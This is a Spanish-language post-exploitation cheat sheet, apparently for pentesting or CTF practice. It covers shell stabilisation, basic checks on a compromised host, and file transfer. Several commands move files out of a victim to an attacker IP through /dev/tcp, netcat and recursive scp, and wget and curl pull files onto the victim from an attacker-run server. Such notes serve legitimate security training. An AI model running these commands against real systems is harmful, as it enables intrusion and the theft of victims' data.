✅Post-Explotación

Shell Stabilisation

Tratamiento TTY default:

script /dev/null -c bash
export TERM=xterm SHELL=bash
# CTRL+Z
stty raw -echo; fg
reset xterm
stty rows <r> cols <c>

Tratamiento TTY Python:

python -c 'import pty;pty.spawn("/bin/bash")' # python, python2 o python3
export TERM=xterm
# CTRL+Z
stty raw -echo; fg
reset xterm
stty rows <r> cols <c>

Comprobaciones

whoami # username
id # user groups
ifconfig # Config de red > IP correcta o contenedor?
env # variables de entorno > Contenedor?

Transferencias:

python3 -m http.server <port>

wget <IPa>:<port>/<file>
curl -O http://<IPa>:<port>/<file>

nc -lvp <port> < file
nc <ip> <port> > file

Desde víctima sin netcat

mediante cateo

cat < <file> > /dev/tcp/<IPa>/<port>
nc -lvnp <port> > <file>

SCP

scp <user>@<IPv>:/<directory>/<file> # Copiar archivo
scp -P <puerto> <user>@<IPv>:/<directory>/<file> # Si SSH no es p22 default
scp -r <user>@<IPv>:/<directory> # Copiar directorio

Transferir todo desde máquina comprometida

scp -r * <username>@<ip-a>:/tmp/.

SMBClient

Transferir archivo a máquina comprometida

smbclient -c 'put <file>' -U <username> -W <workgroup> '//<pc-name>.<workgroup>.<domain-name>/<dir>/' <password>

Última actualización hace 4 meses